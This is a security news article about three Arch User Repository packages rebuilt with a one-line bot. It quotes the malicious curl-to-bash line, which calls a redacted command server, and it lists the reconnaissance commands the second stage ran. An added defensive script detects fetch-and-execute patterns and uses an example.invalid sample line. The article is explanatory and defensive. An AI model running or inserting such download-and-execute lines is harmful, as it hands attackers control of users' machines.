Another Linux distro poisoned with malware
Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating system and rebuilding all their software from scratch.
That sort of thing is not for everyone, but it is harmless fun and it does give you loads of insight into how everything fits together.
That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but do not leave you with much of a sense of how it all actually works.
This time, the malware poisoning happened to Arch Linux, another distro we would characterise as hard-core, though very much more widely used than Gentoo.
Three downloadable software packages in the Arch User Repository were found to have been rebuilt so they contained what you might refer to as zombie malware.
Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.
The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they have all apparently been restored to their pre-infection state.
Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:
curl -s https://[redacted]/~x|bash -&
This single line of code, part of an installation script written in Bash, fetches a text file from a command-and-control (C&C) server and runs it as a script in its own right.
This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the C&C server.
At present, the ~x command sets up a regular background task – the Linux equivalent of a Windows service – that repeatedly runs a second script called u.sh that is downloaded from the web page ~u on the same C&C server.
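The whole infection hinges on one fetch-and-execute line hiding in an install script, so the practical check is to refuse to run makepkg on any PKGBUILD or .install file that pipes curl or wget into a shell. Here is a small auditor for that, written for this article as an added example (it is not code from the article, the Arch project or the malware); the sample PKGBUILD, the example.invalid hostname and the pattern list are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original article: scan a PKGBUILD or .install
# file for "download remote script and run it" patterns before building.
set -u

# Three shapes of download-and-execute, as extended regexes for grep -E:
#  1. curl/wget piped (optionally via sudo or a full path) into sh/bash/zsh/dash
#  2. process substitution: bash <(curl ...)
#  3. eval "$(curl ...)" or eval `wget ...`
PIPE_TO_SHELL='(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(/[[:alnum:]_/.-]*/)?(ba|z|da)?sh([[:space:]]|$)'
PROC_SUBST='(ba|z)?sh[[:space:]]+<\((curl|wget)'
EVAL_FETCH='(eval|source)[[:space:]][^#]*(\$\(|`)(curl|wget)'
PATTERN="$PIPE_TO_SHELL|$PROC_SUBST|$EVAL_FETCH"

# audit_pkgbuild FILE: print every matching non-comment line as "lineno:text".
# Returns 0 when the file is clean, 1 when remote code would be executed,
# so it can gate a makepkg call: audit_pkgbuild PKGBUILD && makepkg -si
audit_pkgbuild() {
    hits=$(grep -En "$PATTERN" "$1" | grep -Ev '^[0-9]+:[[:space:]]*#')
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Constructed sample: an ordinary-looking PKGBUILD with one injected line of
# the kind described above (hostname is a placeholder, not the real C&C).
SAMPLE_PKGBUILD=$(mktemp)
CLEAN_PKGBUILD=$(mktemp)
trap 'rm -f "$SAMPLE_PKGBUILD" "$CLEAN_PKGBUILD"' EXIT
cat > "$SAMPLE_PKGBUILD" <<'EOF'
pkgname=example
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('SKIP')
# curl -s https://example.invalid/~x | bash   (a comment, so it is ignored)
package() {
  cd "$srcdir/$pkgname-$pkgver"
  install -Dm755 example "$pkgdir/usr/bin/example"
  curl -s https://example.invalid/~x|bash -&
}
EOF
# The same file with the injected line removed, for the negative case.
grep -v 'curl' "$SAMPLE_PKGBUILD" > "$CLEAN_PKGBUILD"

for f in "$SAMPLE_PKGBUILD" "$CLEAN_PKGBUILD"; do
    if audit_pkgbuild "$f"; then
        echo "$f: clean, safe to hand to makepkg"
    else
        echo "$f: fetches and executes remote code, do not build"
    fi
done
```

The comment filter matters: a commented-out line is harmless, but the same text inside a package() function is live, which is why line numbers and the non-comment filter are both reported. A real pre-build hook would run this over every file in the AUR checkout, and still not replace reading the diff since the last version you built.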
The u.sh file tries to extract some basic data about the infected system and upload it to a Pastebin account.
The system data that the u.sh malware is interested in comes from the following commands (all standard Linux tools, apart from pacman, which is Arch's package manager):
echo ${MACHINE_ID} – the computer's unique ID (randomly generated at install time)
date +%s – the current date and time, as seconds since the Unix epoch
uname -a – details about the Linux kernel version that is loaded
id – details about the user account running the script
lscpu – technical details about the system processor chip
pacman -Qeq – the software you explicitly installed
pacman -Qdq – any extra packages pulled in as dependencies of it
systemctl list-units – all the system services
Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.
Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.
Where Arch has been a little less likable is the extent to which the distro's culture mirrors the aggressive alpha techiness of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.
So we were not entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant meh:
This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk? This thread is attracting way more attention than warranted. I am surprised that this type of silly package takeover and malware introduction does not happen more often……
To be fair to the Arch team, the hacked packages were found on AUR, the Arch User Repository, whose contents are neither vouched for nor vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.
Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team would not hurt.